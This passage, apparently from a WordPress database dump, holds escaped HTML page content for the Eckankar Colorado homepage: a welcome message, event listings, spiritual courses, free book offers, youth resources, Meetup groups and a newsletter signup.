Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; line-height: 22px; margin-top: 16px; color: #2c2a2a;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; line-height: 23px; color: #2c2a2a;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img bg-img-rounded-bottom-left bg-img-rounded-top-right\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img wp-image-268201 size-full aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 15px; color: #333333;\">(Member Newsletter Subscriptions<br>\r\nAre Available In The <a href=\"https://eckankar-colorado.org/members-page/\">Members Area</a>)</p>\r\n<p style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231366,39155,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 30px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 30px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 